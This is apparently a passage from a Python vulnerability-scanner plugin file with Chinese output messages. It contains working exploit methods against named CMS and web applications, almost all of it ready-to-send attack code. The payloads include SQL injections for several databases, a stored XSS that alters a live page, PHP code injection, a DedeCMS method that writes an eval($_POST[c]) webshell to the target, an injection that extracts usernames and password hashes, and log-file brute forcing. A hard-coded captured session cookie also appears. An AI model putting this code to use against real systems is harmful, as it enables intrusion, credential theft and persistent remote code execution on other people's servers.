        ``is not None``.
        """
        import re
        Regular = "Duplicate entry \'qgveq\|(.+):split:([a-fA-F0-9]{32})\|qkagq"
        Temp = re.search(Regular, res)
        if Temp != None:
            Temp = Temp.group(0)
            return Temp
        else:
            return ""
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        payloads = (
            '/order.php?id=-@`%27`%20UnIon%20select%20username%20from%20`%23@__admin`%20where%20(select%201%20from%20(select%20count(*)%20,concat((select%20concat(0x7167766571,0x7c,md5(123),0x3a73706c69743a,md5(123),0x7c,0x716b616771)),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20id=@`%27`',
            '/order.php?id=-%40%60%27%60%20AND%20%28SELECT%202598%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7167766571%2C%28SELECT%20MID%28%28IFNULL%28CAST%28concat(0x7c,md5(123)%2C0x3a73706c69743a%2Cmd5(123),0x7c)%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x716b616771%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29and%20id%3D%40%60%27%60'
        )
        for payload in payloads:
            # Local `target` is the full probe URL; self.target is untouched
            target = arg + payload
            headers = {"Cookie": "shoppingcart=a,username=a"}
            req = requests.get(target, headers=headers)
            # md5(123) = 202cb962ac59075b964b07152d234b70
            if req.status_code == 200 and "202cb962ac59075b964b07152d234b70" in req.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞;url={url}'.format(
                        target=self.target, name=self.vuln.name, url=target))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check FrogCMS page editing for stored XSS through the ``keywords`` field.

    POSTs an edit of page ``3`` whose keywords contain
    ``"/><script>confirm(1234)</script>`` to ``/FrogCMS-master/admin/``,
    then fetches ``/FrogCMS-master/?about_us`` and reports when the script
    tag is rendered.  The session comes from a hard-coded ``raw_cookies``
    string captured from one specific installation (including a
    ``frog_auth_user`` digest with an expiry), and the ``/FrogCMS-master/``
    prefix and page id are fixed — this check only works against an
    equivalent local setup.  A positive result leaves the modified page on
    the target.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        payload = '/FrogCMS-master/admin/?/page/edit/3'
        # Original note: register a user first.
        # Cookies: parsed from a captured Cookie header (environment-specific)
        cookies = {}
        raw_cookies = 'current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e'
        for line in raw_cookies.split(';'):
            # maxsplit=1: only the first '=' separates name from value
            key, value = line.split('=', 1)
            # NOTE(review): keys keep their leading space after the ';' split
            cookies[key] = value
        #print (cookies)
        # Form-encoded page edit; the XSS sits in page[keywords]
        data = 'page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close'
        url = self.target + payload
        # Step 1: store the payload (response not inspected)
        requests.post(url, cookies=cookies, data=data)
        verify_url = self.target + '/FrogCMS-master/?about_us'
        # Step 2: check the public page for the unescaped tag
        r = requests.get(verify_url)
        if "<script>confirm(1234)</script>" in r.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``publishinfodetail.jsp?pk_message=`` for Oracle-style error-based SQL injection.

    The payload builds an ``XMLType`` from ``CHR()`` pieces that spell the
    marker ``qczgq1qnoiq`` (``XMLType``/``DUAL`` indicate an Oracle
    back end); the target is reported only when the server answers HTTP 500
    *and* the marker is in the body.  A trailing slash on ``self.target``
    (left by an empty ``base_path``) is stripped before the payload is
    appended.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        url = self.target
        # Drop a trailing '/' so the payload's leading '/' is not doubled
        url = url if url[-1] != '/' else url[:-1]
        payload = (
            "/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX%27%20"
            "AND%203814=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||"
            "CHR(122)||CHR(103)||CHR(113)||(SELECT%20(CASE%20WHEN%20(3814=3814)%20THEN"
            "%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(110)||CHR(111)||CHR(105)"
            "||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20%27vdoA%27=%27vdoA"
        )
        verify_url = url + payload
        req = requests.get(verify_url)
        content = req.text
        # The marker is expected inside the server's error page
        if req.status_code == 500 and 'qczgq1qnoiq' in content:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``admin.php?c=syscontroller&m=add`` for code injection via the controller name.

    POSTs a new controller whose ``name`` is ``myndtt*/phpinfo();/*``, then
    GETs ``/index.php?c=myndtt&m=index`` and reports (with the URL) when
    the body contains both ``PHP Version`` and ``System``.  The original
    notes require a registered, logged-in session, yet ``cookies`` is left
    empty.  A positive result presumably leaves the ``myndtt`` controller on
    the target — confirm and clean up.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Original note: register an account, log in, then visit the URL below.
        # Cookies: intentionally empty; the parsing snippet below is inert.
        cookies = {}
        ''' raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx' for line in raw_cookies.split(';'): key,value=line.split('=',1)#1代表只分一次,得到两个数据 cookies[key]=value '''
        payload = "/admin.php?c=syscontroller&m=add&post=1"
        data = "data%5Bname%5D=myndtt*/phpinfo();/*&data%5Bcname%5D=myndtt&app=0&data%5Btype%5D%5B%5D=0&data%5Bmeta_title%5D=1234&data%5Bmeta_keywords%5D=123&data%5Bmeta_descrintion%5D=123"
        url = self.target + payload
        # Step 1: create the controller (response not inspected)
        requests.post(url, cookies=cookies, data=data)
        verify_url = self.target + '/index.php?c=myndtt&m=index'
        # Step 2: phpinfo() output is the success indicator
        r = requests.get(verify_url)
        if 'PHP Version' in r.text and 'System' in r.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                    target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Try two SQL Server injection probes under ``/DPMA/FWeb/`` expecting ``md5('1234')``.

    Each payload forces ``sys.fn_varbintohexstr(hashbytes('MD5','1234'))``
    into a numeric comparison so the conversion error echoes the digest;
    a response containing ``81dc9bdb52d04dc20036dbd8313ed055`` is reported
    with its URL.  The status code is not checked.  Exceptions are logged
    and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        payloads = [
            "/DPMA/FWeb/SPEWeb/Web5/SPEPhotosDetail.aspx?KindSetID=20010&ALBUMID=2011+and+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--",
            "/DPMA/FWeb/WorkRoomWeb/Web/TeacherPhotosDetail.aspx?TID=3050010135+AND+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--&Album_ID=1075"
        ]
        for payload in payloads:
            verify_url = self.target + payload
            #code, head, res, errcode, _ = curl.curl2(url)
            r = requests.get(verify_url)
            # md5('1234') = 81dc9bdb52d04dc20036dbd8313ed055
            if '81dc9bdb52d04dc20036dbd8313ed055' in r.text:
                # security_hole(verity_url)
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Try six SQL Server injection probes that expect the marker ``~testvul``.

    Every payload compares ``db_name()`` concatenated with
    ``CHAR(126)...CHAR(108)`` (the bytes of ``~testvul``) against ``0``,
    so a conversion error echoes the database name followed by the
    marker.  A response with HTTP 200 containing ``~testvul`` is reported;
    the loop continues through all payloads.  Exceptions are logged and
    swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Reference: http://www.wooyun.org/bugs/wooyun-2015-0121337
        payloads = [
            '/VideoDetail.aspx?Guid=111%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
            '/VideoSearchList.aspx?VideoCategoryID=1%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))%3E0--',
            '/ProductListCategory.aspx?ProductCategoryID=1%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))%3E0--',
            '/ArticleDetail.aspx?guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
            '/ArticleDetailNew.aspx?guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
            '/HelpList.aspx?Guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--'
        ]
        for payload in payloads:
            verify_url = self.target + payload
            req = requests.get(verify_url)
            if req.status_code == 200 and "~testvul" in req.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def exploit(self) -> None:
    """Write a tag-library file through DedeCMS ``dede/tpl.php?action=savetagfile``.

    Opens a session, reads the CSRF-style token from the hidden input on
    ``tpl.php?action=upload``, then calls ``savetagfile`` with a PHP body
    (``phpinfo()`` plus an ``eval`` on POST field ``c``) named
    ``cscan.lib.php``.  Success is ``PHP Version`` and ``System`` appearing
    at ``/include/taglib/cscan.lib.php``.  A successful run leaves that
    file on the target; the report gives its URL and asks for its removal.
    The token request relies on an already-authenticated session on the
    target side (no cookies are supplied here).  Exceptions are logged and
    swallowed.
    """
    self.target = self.target.rstrip(
        '/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Step 1: fetch <domain>/dede/tpl.php?action=upload to obtain the token
        s = requests.session()
        r = s.get(self.target+'/dede/tpl.php?action=upload')
        # The token is the name of a hidden input with value "1"
        p = re.compile(
            r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
        if p.findall(r.text):
            token = p.findall(r.text)[0]
            # Step 2: save the tag file (response not inspected)
            s.get(
                self.target + '/dede/tpl.php?filename=cscan.lib.php&action=savetagfile&content=%3C?php%20phpinfo();eval($_POST[c]);?%3E&token={token}'.format(token=token))
            verify_url = self.target + '/include/taglib/cscan.lib.php'
            # Step 3: confirm the file executes (plain request, no session)
            r = requests.get(verify_url)
            if 'PHP Version' in r.text and 'System' in r.text:
                self.output.report(self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
                    target=self.target, name=self.vuln.name, url=verify_url))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Probe ``/Data/Log/YY_MM_DD.log`` for every day of 2018 and report the first hit.

    Advances one day before each request (01-01 is skipped), builds the
    file name from the date and stops at the first URL answering HTTP 200
    with ``INFO:`` in the body.  Unlike the ``exploit`` variant elsewhere
    in this file, the report does not include the matching URL.
    ``self.output.info('正在生成日志爆破字典')`` is emitted on every
    iteration — up to 364 lines per run.  Exceptions are logged and
    swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # Hard-coded search window: nothing outside 2018 is ever tried.
        start = '2018-01-01'
        end = '2018-12-31'
        datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
        dateend = datetime.datetime.strptime(end, '%Y-%m-%d')
        while datestart < dateend:
            datestart += datetime.timedelta(days=1)
            # '2018_01_02'[2:10] -> '18_01_02'
            payload = datestart.strftime('%Y_%m_%d')[2:10]
            # NOTE(review): logged once per day probed, not once per run
            self.output.info('正在生成日志爆破字典')
            vul_url = arg + '/Data/Log/' + payload + '.log'
            # NOTE(review): no timeout — a stalled target blocks the loop.
            response = requests.get(vul_url)
            if response.status_code == 200 and 'INFO:' in response.text:
                self.output.info('字典爆破成功')
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
                break
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check whether any of five editor upload pages under ``/mana/edit/`` is exposed.

    Each JSP path is requested directly; HTTP 200 with either
    ``_upload.jsp`` or ``uploadnexturl`` in the body is taken as the page
    being reachable and is reported.  No upload is attempted — this is a
    presence check only — and every matching path is reported.  Exceptions
    are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        # Reference: http://www.wooyun.org/bugs/wooyun-2015-0108559
        payloads = [
            '/mana/edit/uploadattcah.jsp',
            '/mana/edit/attach_upload.jsp',
            '/mana/edit/uploadimg.jsp',
            '/mana/edit/uploadmult.jsp',
            '/mana/edit/uploadflash.jsp'
        ]
        for payload in payloads:
            #code, head, res, errcode, _ = curl.curl2(arg+payload)
            r = requests.get(self.target + payload)
            if r.status_code == 200 and ('_upload.jsp' in r.text or 'uploadnexturl' in r.text):
                #security_hole('Arbitrary file upload vulnerability '+ arg + payload)
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``com_rsfiles`` ``cid`` for a UNION-based SQL injection.

    Appends a UNION SELECT evaluating ``md5(3.1415)`` (with ``/**/`` and
    ``+`` as whitespace substitutes) and reports the target when
    ``63e1f04640e83605c1d177544a5a0488`` appears in the response.  Uses
    browser-like headers and a 50 s timeout.  Exceptions are logged and
    swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # Endpoint under test
        exploit = '/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
        # UNION payload that makes the server compute md5(3.1415)
        payload = "-1/**/aNd/**/1=0/**/uNioN++sElecT+1,md5(3.1415)--"
        # Full request URL
        vulurl = arg + exploit + payload
        # Custom HTTP headers
        httphead = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive'
        }
        # Send the request
        resp = requests.get(vulurl, headers=httphead, timeout=50)
        # Look for the marker (md5(3.1415) = 63e1f04640e83605c1d177544a5a0488)
        if '63e1f04640e83605c1d177544a5a0488' in resp.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def verify(self) -> None:
    """Check ``index.php?m=member&f=register_save`` with a registration form sent as GET.

    URL-encodes the ``data`` form (user name and password are redacted as
    ``******`` in this copy) and appends it after a second ``?`` — the base
    URL already contains one, so the resulting query string is malformed.
    The target is reported when HTTP 200 and ``ac59075b964b0715`` (a
    substring of md5(123), seen in full elsewhere in this file) are in the
    response.  Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip('/') + '/' + (
        self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # Local `target` is the probe URL; self.target is untouched
        target = arg + "/index.php?m=member&f=register_save"
        data = {
            "username": "******",
            "password": "******",
            "password2": "123456",
            "fields[truename]": "",
            "fileds[email]": "",
            "submit": " ? ? "
        }
        payload = urllib.parse.urlencode(data)
        # NOTE(review): `target` already has a query string, so this adds a
        # second '?' instead of '&'.
        req = requests.get(target + "?" + payload)
        if req.status_code == 200 and "ac59075b964b0715" in req.text:
            self.output.report(
                self.vuln,
                '发现{target}存在{name}漏洞'.format(target=self.target, name=self.vuln.name))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def exploit(self) -> None:
    """Use the ``com_kunena`` user-list UNION injection to read one ``jos_users`` row.

    The UNION SELECT concatenates ``username``, ``password`` and ``email``
    between ``$~~~$`` / ``***`` delimiters; when ``$~~~$`` is present the
    regex ``\\$~~~\\$(.*)\\*\\*\\*(.*)\\*\\*\\*(.*)\\$~~~\\$`` extracts the
    fields and the first two are reported.  ``email`` (group 3) is matched
    but not reported.  Uses browser-like headers and a 50 s timeout.
    Exceptions are logged and swallowed.
    """
    self.target = self.target.rstrip(
        '/') + '/' + (self.get_option('base_path').lstrip('/'))
    try:
        self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # Endpoint under test
        exploit = '/index.php?option=com_kunena&func=userlist&search='
        # UNION payload returning delimited user fields
        payload = "%' and 1=2) union select 1, 1,concat(0x247e7e7e24,username,"\
            "0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users limit 0,1-- ;"
        # Full request URL
        vulurl = arg+exploit+payload
        # Custom HTTP headers
        httphead = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive'
        }
        # Extraction regex.  NOTE(review): not a raw string, so the `\$`
        # and `\*` sequences are invalid escapes (a SyntaxWarning on newer
        # Pythons); an r'' literal would express the same pattern.
        parttern = '\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
        # Send the request
        resp = requests.get(url=vulurl, headers=httphead, timeout=50)
        # Cheap delimiter check before running the regex
        if '$~~~$' in resp.text:
            # Extract the fields
            match = re.search(parttern, resp.text, re.M | re.I)
            if match:
                username = match.group(1)
                password = match.group(2)
                self.output.report(self.vuln, '发现{target}存在{name}漏洞,获取到的用户名为{username} 密码为{password}'.format(
                    target=self.target, name=self.vuln.name, username=username, password=password))
    except Exception as e:
        self.output.info('执行异常{}'.format(e))
def exploit(self) -> None:
    """Enumerate ``/log/operate_YYYY-MM-DD.log`` for every day of 2018.

    Advances one day before each request (01-01 is skipped) and stops at
    the first URL answering HTTP 200 with ``loginame`` in the body,
    reporting that URL.  ``self.target`` is used as-is (no ``base_path``
    normalisation).  The initial ``payload`` assignment is dead: the loop
    overwrites it before any use.  Exceptions are logged and swallowed.
    """
    try:
        self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
            target=self.target, vuln=self.vuln))
        arg = '{target}'.format(target=self.target)
        # NOTE(review): unused — overwritten on the first loop iteration
        payload = "/manager/admin_ajax.php?action=save&tab={pre}thirdpart_config"
        # Hard-coded search window: nothing outside 2018 is ever tried.
        start = '2018-01-01'
        end = '2018-12-31'
        datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
        dateend = datetime.datetime.strptime(end, '%Y-%m-%d')
        while datestart < dateend:
            datestart += datetime.timedelta(days=1)
            payload = datestart.strftime('%Y-%m-%d')
            vul_url = arg + '/log/operate_' + payload + '.log'
            # NOTE(review): no timeout — a stalled target blocks the loop.
            respose = requests.get(vul_url)
            if respose.status_code == 200 and 'loginame' in respose.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞,获取的漏洞url地址为{url}'.format(
                        target=self.target, name=self.vuln.name, url=vul_url))
                break
    except Exception as e:
        self.output.info('执行异常{}'.format(e))